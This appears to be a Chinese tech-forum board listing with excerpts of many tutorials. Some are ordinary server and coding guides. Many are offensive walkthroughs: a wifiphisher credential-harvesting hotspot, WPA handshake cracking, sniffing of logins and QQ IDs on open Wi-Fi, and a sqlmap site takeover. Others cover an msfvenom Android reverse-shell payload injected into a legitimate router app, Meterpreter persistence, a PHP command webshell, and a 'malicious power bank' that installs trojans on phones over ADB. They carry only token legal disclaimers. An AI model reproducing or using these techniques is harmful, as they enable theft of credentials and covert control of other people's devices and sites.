建站VPS工具综合杂谈
网站建设、网络程序源码、IPS Invision Community、Xenforo、WordPress等其它源码系统程序交流,包括VPS推荐、服务器建站技术讨论等话题。
365个主题在此版面
-
本文申明 本文的主旨是,让身边的人更加了解WiFi安全问题,而非而已的攻击他人。因本文具有一定的攻击行为,若您阅读后请务必准守国家相关网络安全法规。若由于您的行为造成他人损失的,责任自负。本站、本文不承担任何法律责任。若您同意请接着往下阅读,否则请您离开阅读其他文章。感谢支持!!! 原理示意图 设备清单树莓派(笔记本也可以)无线网卡(两个,只要kali支持的就行)钓鱼页面(文末下载) 拉取开源项目 git clone https://github.com/wifiphisher/wifiphisher.git cd wifiphisher sudo python setup.py install安装错误解决方案 在安装过程中,失败的最重要因素是网络问题,所以在安装过程中请保证网络良好。部分依赖下载失败,请挂乳酸菌或者更换国内的源。 钓鱼页面在文末下载钓鱼页面,放到wifiphisher/data/phishing-pages/oauth-login并替换。 在终端执行下面命令: wifiphisher --essid "FREE WI-FI" -p oauth-loginps: --essid :WiFi信号 视频演示 当用户输入账号等信息后,我们在后台即可得到账号和面。 附件下载 附件下载 解压密码: 查看文章隐藏内容或点我查看
-
- 0 篇回复
- 15 次查看
-
-
前言在一个风高夜黑的晚上,我深深的抽了一口烟。看了看窗外匆匆的行人,正在感叹生活的不易。突然我的企鹅di~di~的响了起来。定眼一看我去还是个女的。发来了一个链接…… 好奇心害死猫 顺手就点开了链接。 但是提示404错误。嗯……狠狠地抽口了烟,陷入了沉思! 既然是短连接,那就还原,看看原来的网址。 前期的信息收集拿出神器nmap扫一波看看。 可见,开启了我们常见的80、888,、3306、8080、8888等端口,我们访问888和8888发现是宝塔面板 扫描网站目录: 找到了后台目录 admin以及安装目录install 网站cms查询 得到了apache等相关的信息,并未得到相关的cms信息。 漏洞扫描启动Acunetix丢进目录 扫一波 扫到了SQL注入漏洞和XSS漏洞 关于这两个漏洞的利用,在前面的教程中已经提到了很多次,这里不再啰嗦。 提起sqlmap来一波。 先到存在sql注入的页面看看,嗯哼……是个查询页面。Burp搞起! 利用sqlmap注入 获取管理员密码 登录后台 拿Shell 由于后台没有上传点,上传也就没法搞,还有一种情况就是如果知道网站的绝对路劲。我们可以利用sqlmap拿下shell。 对代码的审计通过观察,这个网站就是一个探针程序。通过分享的连接诱导别人点击。从而获取对方的ip地址和gps信息。感觉挺好玩的! 于是在GitHub在爬了下来送给大家。 附件下载 但是在安装过程中提示如下: 提示未授权,OK我们对代码进行审计 这里有这么一行 function check_authoriz…
-
- 0 篇回复
- 19 次查看
-
-
前言在kali下我们来搭建web系统环境,在平时我们可在win系列的系统上用Phpstudys等集成环境来搭建,快捷 方便。今天来看看如何在kali下搭建环境。此中安装方法也适应Debian系列的系统。 注意:如果是虚拟机安装的kali 系统已经默认安装。直接用就行了,不需要安装。 安装Apacheapt-get install apache2启动Apacheservice apache2 start验证在浏览器访问kali的ip地址,出现下面的页面证明Apache安装成功。 安装PHP7.3apt-get install php7.3 libapache2-mod-php7.3 php7.3-mysql php7.3-curl php7.3-json php7.3-cgi php7.3-gd其中 php7.3-cgi 、php7.3-gd为相应的PHP模块,如果你的程序需要其他模块的支持,执行apt-get install php7.3-需安装的模块即可。 填坑:笔者在安装过程中,在安装完成PHP后,但是不能解析。通过分析是没有安装libapache2-mod-php7.3 如果不能解析PHP的,请执行apt-get install libapache2-mod-php7.3 即可。 验证是否安装执行命令php -v 这样 我们的PHP就安装完成了。 PS: 查看安装的模块php -m 探针验证我们新建一个php文件 内容如下: <?php phpinfo(); ?>访问探针 安装数据库apt-get in…
-
- 0 篇回复
- 11 次查看
-
-
关于HashcatHashcat是什么呢?Hashcat是当前最强大的开源密码恢复工具,你可以访问Hashcat.net网站来了解这款工具的详细情况。本质上,Hashcat 3.0是一款高级密码恢复工具,可以利用CPU或GPU资源来攻击160多种哈希类型的密码 准备hashcat(5.1)kali自带cap数据包字典一份(为了节约时间 就不演示枚举了) cap文件转化为hccap格式aircrack-ng <out.cap> -J <out.hccap> 需要注意的是:此种方法转换的数据包只适应比较早的hashcat,新版的已经废弃。 如下:我么转换时会提示下面错误! 解决方法: 到https://hashcat.net/cap2hccapx/上传我们的数据包 转换后的数据包格式为.hccapx 开始破解hashcat -m 2500 xxx.hccapx dics.txt参数说明: xxx.hccapx(转换的数据包)dics.txt (字典) 但是运行上面命令后,又会报错。 Device #1: Not a native Intel OpenCL runtime. Expect massive speed loss. You can use --force to override, but do not report related errors. …
-
- 0 篇回复
- 16 次查看
-
-
法律声明本文的宗旨是让更多的人了解身边的WiFi安全和WiFi安全爱好者学习研究,而非提供恶意教学。造成的法律后果请自行承担,与本站和作者无关。特此声明!!!!! 环境说明apache+php7.3+mysqlkali2019.43070无线网卡html页面 配置web服务器首先将整个站点上传到/var/www/html下。 配置config.php<?php $dbhost = 'localhost'; // mysql服务器主机地址 $dbuser = 'root'; // mysql用户名 $dbpass = 'root'; // mysql用户名密码 ?>注意: 在配置此文件之前,请先配置好你的数据库。数据库密码为你初始化设置的密码。 如果对数据库的配置有问题的,请参考文章 kali自带mysql配置 kali是自带mysql服务,今天我们来看看,如何配置mysql。启动myslqservice mysql sta... 安装站点首先我们启动apache和mysql service apache2 start service mysql start这里为了使安装成功,我们利用mysql -u root -p登录数据库,检测账号和密码的准确性。 在浏览器访问http://kali的ip/install.php 提示如下:证明安装成功! 如果提示下面错误: Connection failed: Access denied for user 'ro…
-
- 0 篇回复
- 14 次查看
-
-
首先我们先搭建一个AP,没加密的那种、能联网的那种。 。搭建方法比较多,可以参考我们以前的教程。这里不在多说。 对目标浏览网站图片的窃取在kali下,我们利用Driftnet即可! 执行命令: driftnet -i wlan0 对目标账号和密码的分析需要注意的是,这种方法只对http协议的网站有效。 我们筛选所有的post数据包http.request.method == "POST" 对目标QQ号分析对于电脑QQ而言,很简单。我们只需要分析qicq协议即可得到目标的QQ号。但是对于手机QQ由于用的协议不同,故而不能利用此种方法。通过对数据包的分析,我们可以利用对QQ空间的访问信息,获取目标QQ。 输入uin=进行报文筛选 对快手信息分析用同样的方式,我们利用关键词user_id进行报文筛选。 得到了下面一条信息 http://apissl.ksapisrv.com/rest/n/user/settings?mod=Xiaomi%28MI%208%20SE%29&appver=6.8.1.10783&isp=CTCC&lon=104.929677&language=zh-cn&sys=ANDROID_9&max_memory=256&ud=666153773&egid=DFP1556DD2EE54045D41BA2E3C68BEC77456F8373E79C118B684EC17B6FE6F18&oc=XIAOMI&sh=2244&net=…
-
- 0 篇回复
- 18 次查看
-
-
我们在利用Hashcat破解密码的时候,总是由于我们设备的问题而焦头烂额。显卡太垃圾,破解一个密码需要几年,我们该如何解决这种尴尬呢?今天我们来看看Hashcat的分布式破解吧! 官方参数如下:-S, --slow-candidates Enable slower (but advanced) candidate generators | 启用较慢(但高级)的候选生成器 --brain-server Enable brain server | 启用BRAIN服务器 -z, --brain-client Enable brain client, activates -S | 启用大脑客户端,激活-s --brain-client-features Define brain client features, see below | 定义大脑客户端功能,见下文 --brain-host Brain server host (IP or domain) | BRAIN服务器主机(IP或域) --brain-port Brain server port | …
-
- 0 篇回复
- 16 次查看
-
-
什么是SEO,所谓seo优化就是让百度,360,搜狗,等搜索引擎收录你的破站。也许你会说,搞那个干吗,反正我的网站百度迟早会收录的。但是SEO可以使你的网站更快的让搜索引擎收录,以及在搜索引擎中的排名。 首先我们先看看本站的数据吧 这里以百度为例,说说常见的SEO的几个数据 主动推送:最为快速的提交方式,建议您将站点当天新产出链接立即通过此方式推送给百度,以保证新链接可以及时被百度收录。 sitemap:您可以定期将网站链接放到Sitemap中,然后将Sitemap提交给百度。百度会周期性的抓取检查您提交的Sitemap,对其中的链接进行处理,但收录速度慢于主动推送。 手工提交:如果您不想通过程序提交,那么可以采用此种方式,手动将链接提交给百度。 自动推送:是轻量级链接提交组件,将自动推送的JS代码放置在站点每一个页面源代码中,当页面被访问时,页面链接会自动推送给百度,有利于新页面更快被百度发现。 优化方法基于插件的优化:我们可以根据不同的平台,安装不同的seo插件。如:DZ,typecho,WP等常见的程序,下载相应的插件即可。 利用Python爬虫 我们可以利用下面代码对网站进行爬虫 import os import re import shutil REJECT_FILETYPE = 'rar,7z,css,js,jpg,jpeg,gif,bmp,png,swf,exe' def getinfo(webaddress): global REJECT_FILETYPE url = '…
-
- 0 篇回复
- 24 次查看
-
-
使用SMTP发送邮件#-*- coding: UTF-8 -*- import smtplib from email.mime.text import MIMEText from email.header import Header msg_from = '[email protected]' #发送方邮箱 passwd = 'xxxx' #填入发送方邮箱的授权码(填入自己的授权码,相当于邮箱密码) msg_to = ['[email protected]'] #收件人邮箱 subject = "新年快乐!" #主题 content = "我是邮件的内容,祝你新年快乐。" msg = MIMEText(content) #放入邮件主题 msg['Subject'] = subject msg['From'] = msg_from try: #通过ssl方式发送,服务器地址,端口 s = smtplib.SMTP_SSL("smtp.163.com", 465) #登录到邮箱 s.login(msg_from, passwd) #发送邮件:发送方,收件方,要发送的消息 s.sendmail(msg_from, msg_to, msg.as_string()) print('成功') except s.SMTPException as e: print(e) finally: s.quit()效果如下
-
- 0 篇回复
- 15 次查看
-
-
Python的学习过程中,往往会学习到很多库,而安装各类库的时候,往往不尽人意,下载速度从几KB到十几KB。甚至下载到一半还超时报错。这都是因为pip源是访问国外的官方源,如果需要把源改成国内源如:阿里源、网易源等,需要做如下设置。1)打开我的电脑。2)在我的电脑上的地址栏输入:%appdata%,然后回车。 3) 在这里面新建一个文件夹 pip4) 在pip文件夹里面新建一个文件叫做 pip.ini ,内容写如下即可。 [global] timeout = 6000 index-url = https://mirrors.aliyun.com/pypi/simple/ trusted-host = mirrors.aliyun.com测试下,舒服飞起来。 Linux下的配置cd ~ mkdir ~/.pip vi ~/.pip/pip.conf编辑内容,和windows一模一样即可。 hi 这是一个信封
-
- 0 篇回复
- 15 次查看
-
-
说明:本项目是基于NodeMCU 和百度天工组合,搭建的实时监测室内温度和湿度项目。 首先我们看看效果怎么样 在线demo 硬件准备NodeMCU(esp8266开放版)DHC11杜邦线 云平台注册1,访问百度天工注册账号,如果有百度账号直接登录即可。2,在左侧「产品服务」-「物联网服务」中,选择「物接入」3,点项目名称可进入到项目详情页面,点击「新建物模型」。填写「名称」、「添加属性」。这里的属性就是我们需要采集的上报的信息,所以这里我加了两个属性:D1_Temperature 温度 number类型 D1_Humidity 湿度 number类型 4 创建完物模型,接下来创建物影子。名称自定义即可,这个在后面会用到。来自的物模型选择刚才创建的模型,点击创建即可完成。创建完成后,获取连接信息备用(连接信息中,key 是仅在生成后显示一次的)这里建议将配置信息下载。 5 购买实时数据库(用来储存温度和湿度的数据)点击时序数据库 TSDB配置即可,完成后付费即可(2元/一月) 到此,百度云的配置到此结束。 给板子刷入固件工具百度物联网固件软件ESP8266Flasher ESPEasy 百度天工适配版 刷入固件 连线VCC(+、3.3v) DATA(D4) GND(-、G ) 配置刷完系统,打开电脑 WiFi 列表,可以看到 ESP_Easy_0 作为无线热点出现了,而且是加密(密码是configesp),连接它。如果没发现,请重启 NodeMCU。 连上后,请在浏览器尝试打开 192.168.4.1,会跳转到设置页面。 选择…
-
- 0 篇回复
- 15 次查看
-
-
一、下载JDK1.首先需要下载java开发工具包JDK,下载地址:http://www.oracle.com/technetwork/java/javase/downloads/index.html 2.进行安装,本机为64位,所以安装了64位版本 注意:下载过程可能比较漫长,我们可以选择其他的源进行下载。 配置java环境在电脑桌面 右键点击 “此电脑”的“属性”选项--选择“高级系统设置”选项--点击下面的“环境变量”选项 点击“系统变量”下面的”新建“选项 在”变量名“处填上”Java_Home“ ”变量值“为JDK安装路径,笔者的路径是”D:\Program Files\Java\jdk1.8.0_91“ 点击”确定“选项 注意:jdk1.8.0_91为你的java版本,需要对应。 在”系统变量“中找到”Path“ 选择右边的“编辑文本”,将引号里面的全部复制“%Java_Home%\bin;%Java_Home%\jre\bin;”,到“变量值”栏的最前面,“确定” 在“系统变量”栏,“新建”,“变量名”为“CLASSPATH”,“变量值”为“.;%Java_Home%\bin;%Java_Home%\lib\dt.jar;%Java_Home%\lib\tools.jar”,“确定” 检验环境在cmd中输入java javac能看到java的相关命令。则说明安装成功。 安装esplise 到esplise的官网下载安装即可。 汉化安装eclipse2019之后,在官网下载对应的语言包: https://www.eclip…
-
- 0 篇回复
- 15 次查看
-
-
zfaka,免费、安全、稳定、高效的发卡系统Github项目地址:https://github.com/zlkbdotnet/zfaka 注意:本篇文章适合已安装zfaka平台。 增加payjs支付方式payjs是一款适用于个人收款的微信收款解决方案,以前尝试过申请微信支付,但是门槛比较高。但是通过payjs可以轻松的解决此问题。需要注意的是,payjs认证需要300元,但是不要但是,老司机会给你发优惠码。便宜下来也就200元。(需要上车的小伙伴,下方留言即可!)基本生意下来本基本上就赚回来啦! 1.把附件Payjs下面的 三个文件夹payjs、payjswx、payjsalipay 上传到zfaka程序的`application\library\Pay 文件夹下。 附件 payjs下载 2.把tpl下面的文件 payjsalipay.html,payjswx.html 上传到application\modules\Admin\views\payment\tpl 下面 附件 tpl下载 3.登录服务器--登录数据库 mysql -u root -p use 数据库; INSERT INTO `t_payment` (`payment`, `payname`, `payimage`, `alias`, `sign_type`, `app_id`, `app_secret`, `ali_public_key`, `rsa_private_key`, `configure3`, `configure4`, `overtime`, `…
-
- 0 篇回复
- 14 次查看
-
-
关于msfconsolemsfconsole简称msf是一款常用的渗透测试工具,包含了常见的漏洞利用模块和生成各种木马。是出家旅行的必备神器,今天我们在一起来回顾下吧。 启动在终端执行 service postgresql start #启动postgresql 不启动也可以 msfconsole 常见的参数解读-p, –payload < payload> 指定需要使用的payload(攻击荷载)。也可以使用自定义payload,几乎是支持全平台的 -l, –list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all -n, –nopsled < length> 为payload预先指定一个NOP滑动长度 -f, –format < format> 指定输出格式 (使用 –help-formats 来获取msf支持的输出格式列表) -e, –encoder [encoder] 指定需要使用的encoder(编码器),指定需要使用的编码,如果既没用-e选项也没用-b选项,则输出raw payload -a, –arch < architecture> 指定payload的目标架构,例如x86 | x64 | x86_64 –platform < platform> 指定payload的目标平台 -s, –space < length> 设定有效攻击荷载的最大长度,就是文…
-
- 0 篇回复
- 13 次查看
-
-
持久化在msf生成的shell中,无论是是android还是windows在关闭软件或者设备重启后,我们的会话进程都会自然而然的关闭。要想得到会话,必须用户再次启动我们的shell才能得到会话。那么,我们该如何解决这一问题呢? msf/Windows持久化1、metsvc:通过服务启动,是 Meterpreter 下的一个脚本; 运行 run metsvc 将会在目标主机上以 Meterpreter 的服务的形式注册在服务列表中,并开机自动自动; 运行 run metsvc -r 卸载目标主机上的 Meterpreter 服务; 原理:设置的后门在目标机启动后会自动开启一个服务,等待连接;这个有点正向代理的意思,自己开个端口等待接入控制; 优点:命令简单,不必设置太多参数,即不需要设置反弹到的主机IP、端口等,直接 run metsvc -A; 缺点:如何其他人知道服务器的ip,都可以利用这个后门开启的服务来控制服务器【扫描器发现】; 2、persistence:通过启动项启动,也是 Meterpreter 下的一个脚本; 移除后门:删除注册表中的值和上传的 VBScript 文件,具体位置执行脚本后有提示。 原理:有点反向代理的意思; 优点:由于是主动献殷勤,目标机器上的防火墙对于此等操作一般均会放行,后门的存活率较高; 环境介绍vps(msf端口)win10 (受害者) 生成shellmsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.100 LPORT=4444…
-
- 0 篇回复
- 18 次查看
-
-
一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。 安装git clone https://github.com/tegal1337/Shelly cd Shelly pip install -r requirements.txt 安装模块 使用启动python3 shell.py生成一个shell python3 shell.py -g "kali" -p "88888" 分析代码<?php ($_GET['passwd'] == '888888') ? NULL : exit; system($_GET['c']); shell_exec($_GET['c']); ?>
-
- 0 篇回复
- 14 次查看
-
-
利用Python对mysql进行读写操作,创建数据库,插入数据,更新数据,删除数据等操作。 连接数据库#!/usr/bin/python #-*- coding: UTF-8 -*- import MySQLdb #打开数据库连接 db = MySQLdb.connect("localhost", "testuser", "test123", "TESTDB", charset='utf8' ) #使用cursor()方法获取操作游标 cursor = db.cursor() #使用execute方法执行SQL语句 cursor.execute("SELECT VERSION()") #使用 fetchone() 方法获取一条数据 data = cursor.fetchone() print "Database version : %s " % data #关闭数据库连接 db.close()创建数据库表#!/usr/bin/python #-*- coding: UTF-8 -*- import MySQLdb #打开数据库连接 db = MySQLdb.connect("localhost", "testuser", "test123", "TESTDB", charset='utf8' ) #使用cursor()方法获取操作游标 cursor = db.cursor() #如果数据表已经存在使用 execute() 方法删除表。 cursor.execute("DROP TABLE IF EXISTS EM…
-
- 0 篇回复
- 15 次查看
-
-
本示例仅为学习研究所用,使用请准守《网络安全法》。造成一切后果,自行承担。本站不但任何责任!!! 前期的准备某路由器管理APP(luyou.apk)kali Linux手机(android 10) 01 生成Android shell在生成之前,确定本机的ip地址。 msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.93 LPORT=5555 R > 66.apk这样我们便生成了一个名为66.apk的android shell 02 反编译刚才生成的shell和正常appapktool d 66.apk apktool d luyou.apk 反编译后的效果 03 注入PAYLOAD-1 进入luyou文件夹,打开AndroidManifest.xml文件 -2 搜索关键字Launch和Main找到所对应启动的smail文件,说白了就是找app启动文件路径 当前的启动路径为:com/mercury/mercuryrouterLaunchActivity 打开文件LaunchActivity.smali搜索onCreat函数,找到bundle对象,换行添加启动PAYLOAD代码: invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V 04 将木马文件中的smali文件复制到载体smali文件夹中cp -r 66/smali/com/* l…
-
- 0 篇回复
- 15 次查看
-
-
ServerStatus-Toyo版是一个酷炫高逼格的云探针、云监控、服务器云监控、多服务器探针 该探针又服务器端和客户端两方面构成,服务端只安装一个,客户端需要在监控的VPS上面安装。 一、服务器端安装登录服务器,下载脚本。 附件下载 下载完成后,上传到服务器。 在终端执行 status.sh s 需要注意的是,由于网络环境的问题,安装过程可能会失败。多尝试几次即可!!! 1.2设置端口这里默认回车即可(35601)需要注意的是,需要在安全组中放行改端口。 1.3 配置web由于我们的服务器已经配置好了web环境,所以这里我们选择N 然后,我们到宝塔或者Apache中新建虚拟主机,并且解析到目录/usr/local/ServerStatus/web 如上,看到如上所示,证明我们的服务端就安装完成。 1.4 验证在浏览器中输入你刚才解析的域名或者ip地址,要是能够访问探针页面,则说明安装成功。 安装客户端登录需要被监控的服务器 下载一键安装脚本(同服务器端脚本) 客户端脚本 2.1安装客户端在终端执行 status.sh c 按1选择安装客户端 2.2 输入服务器端的IP,或者服务器端配置的域名这里的ip地址或者域名为你的服务端的ip或者域名,如果你的客户端和服务器在同一服务器。默认127.0.0.1即可。 2.3 输入端口默认即可(要和服务端的端口一样) 2.4 为本台服务器添加客户端用户名及密码 保存好刚才设置的账号和密码,后面再服务端添加节点的时候要用。 这样,我们的客户端就安装和配置完成了。现在我们返回到服务端添加节点即…
-
- 0 篇回复
- 17 次查看
-
-
AdGuard 是拥有可获取最佳网络冲浪体验所需全部功能的独特程序。其组合了世界上最高级的广告拦截器,隐私保护模块以及家长控制 - 可协同任何浏览器和应用工作。 在树莓派下安装wget https://static.adguard.com/adguardhome/release/AdGuardHome_linux_arm.tar.gz tar xvf AdGuardHome_linux_arm.tar.gz sudo ./AdGuardHome -s install一旦启动并运行,您可以在浏览器中输入以下内容,在端口3000上访问您的AdGuard Home Web界面 - http://192.168.10.20:3000/进行安装。 注意,如果你的的是VPS请在安全组中开启3000 80 等端口 接着下一步 设置web的端口,默认80这里我改成了81因为我本地80端口有web环境。为了避免冲突我改成了81。 设置管理员密码 到这里,我们就安装完成了,现在根据提示我们进行配置,我们这里以路由器为基础进行配置。 配置路由器登录路由器,在网络设置中修改DNS 这里将DNS修改为我们树莓派的ip 如果是电脑或者安卓手机,将dns改为127.0.0.1和树莓派ip 开始配置在浏览器中输入http://树莓派ip:81即可登录管理页面。 配置你的AdGuard在过滤——自定义过滤规则中添加我们的规则。 这里我们以屏蔽小米广告为例: ||douyin.com^ ||api.assistant.miui.com^$importan…
-
- 0 篇回复
- 19 次查看
-
-
本教程纯属虚构,里面涉及到的思路仅供吹牛。请勿非法使用,造成法律后果请自负! 什么是恶意充电宝 准备树莓派(虚拟机下没有尝试,因为需要安装手机的驱动。理论上应该也是可以的。)充电宝外壳(有条件的可以尝试利用3D打印,自己做一个外壳。) -数据线 安装ADB在树莓派中执行 apt-get install adb如果失败,请更新你的源为国内阿里云或中科大的源。 验证在终端中输入 adb如下,则证明安装完成。 配置手机在设置中开启 开发者选项—USB试调即可。 开始测试将手机和树莓派用数据线连接 这里提示是在充电,我们来看看在不知不觉中我们是如何进入手机的。 终端执行 adb devices 其中 34fb90f30704 device就是我们刚才连接的手机。 比如这时想指定 34fb90f30704 这个设备来运行 adb 命令获取屏幕分辨率: adb -s 34fb90f30704 shell wm size 显示手机中的所有应用adb shell pm list packages 其他命令参见列表 安装apk利用这个功能,我们可以把msf木马安装到我们的目标手机,方便我们测试! 命令格式: adb install [-lrtsdg] <path_to_apk>参数: adb install 后面可以跟一些可选参数来控制安装 APK 的行为,可用参数及含义如下: 如:adb install -g /root/11.apk 效果如下: 文件管理复制设备里的文件到电脑命令: adb pull <设备里的文件路…
-
- 0 篇回复
- 32 次查看
-
-
对于WIFI破解,总的来说方法就是那么几种。也没什么特别的技术含量。这么多年了,还是停留在以前陈旧的抓包破解的过程。也没有新的攻击方式,但是相信随着信息技术的发展。越来越多的技术漏洞也会说着披露。 启动fern wifi cracker在kali的菜单中,找到无线攻击模块,里面就有fern wifi cracker 选择无线网卡并扫描网络选择你的无线网卡wlan如果没有,则说明你的网卡不支持。 然后点击第二个,骚等片刻即可出现要攻击的WiFi。 这里扫描需要等待会儿 设置字典位置,开始破解。 总结相对来说,破解还是很简单的。纯属傻瓜式一步到位!破解的成功率也是依靠字典,所以比款工具仅仅适合新手入门!
-
- 0 篇回复
- 33 次查看
-
-
随着Fluxion的更新,越来越多的小伙伴觉得Fluxion越来越不好玩了。变得越来越复杂,没有以前的旧版本简单实用。其实程序的更新是一件很好的事情,因为更新往往意味着解决以往的Bug,和全新的体验。NOW就让我们一起踩坑吧! 首先还是硬件方面: 在前面的几篇文章中,我经常提到。对于WiFi钓鱼推荐网卡型号为3070。这里我们不再多说。 关于Fluxion的安装 安装相对来说,还是很简单的,我们根据官方给出的安装文档安装即可。 git clone https://www.github.com/FluxionNetwork/fluxion.git cd fluxion ./fluxion.sh然而大多数人在这里常常安装失败,问题在于你的源有问题。kali如何更新源,请移步文章 《kali更新源》 如需手动安装模块,只需要执行apt-get install xxx后跟缺失的模块 这里我们以FLUXION 6.5 作为演示 在终端执行./fluxion.sh 选1 这时会分配你的无线网卡为监听模式,在新版中支持对5GWiFi的支持。 扫描周围的WiFi 按ctrl+c停止。 然而,在新版中最大的问题是在这里 很多人在这里就不会搞了,在旧版中fluxion会自动抓取WiFi的包,而新版中放弃了这个功能,需要我们收到抓。这门这里只需要填写我么抓到包的路劲即可。如/root/66.cap 其他的就和旧版一样了。 这里在填一个坑,有的小伙伴在最后一步建立钓鱼WiFi时会卡在开始建立钓鱼热点AP这是因为你的网卡问题,如8187的网卡就有…
-
- 0 篇回复
- 13 次查看
-
-
具有很多功能,包括元数据编辑器,SQL编辑器,丰富的数据编辑器,ERD,数据导出/导入/迁移/备份,SQL执行计划等。 基于Eclipse平台。使用插件架构,并为以下数据库提供附加功能:MySQL / MariaDB,PostgreSQL,Greenplum,Oracle,DB2 LUW,Exasol,SQL Server,Sybase / SAP ASE,SQLite,Firebird,H2,HSQLDB,Derby,Teradata,Vertica,Netezza,Informix等。 环境支持:需要安装Java环境 下载官网下载 使用 连接数据库 数据库-新建数据库 选择数据库的类型,连接即可! linux的安装下载.deb包,执行命令 dpkg -i xxx.deb即可完成安装!
-
- 0 篇回复
- 13 次查看
-
-
Usbrip(源自“USB Ripper”,而不是“USB RIP”惊人)是一个开源取证工具,带有CLI界面,可让您跟踪USB设备工件(即USB事件历史记录,“已连接”和“已断开连接”事件) Linux机器。 安装我们利用pip安装即可! pip install usbrip 示例usbrip events history -ql -n 100查询历史记录 如上图,在2020-03-20 02:25:59有个Android设备插入了USB。 这个是LINUX上查看USB的使用记录,那么在Windows下该怎么查看呢? 其实很简单,我们在cmd中执行下面命令即可: for /f %i in ('reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR') do @for /f %x in ('reg query "%i"') do @reg query "%x" /v FriendlyName | findstr FriendlyName
-
- 0 篇回复
- 13 次查看
-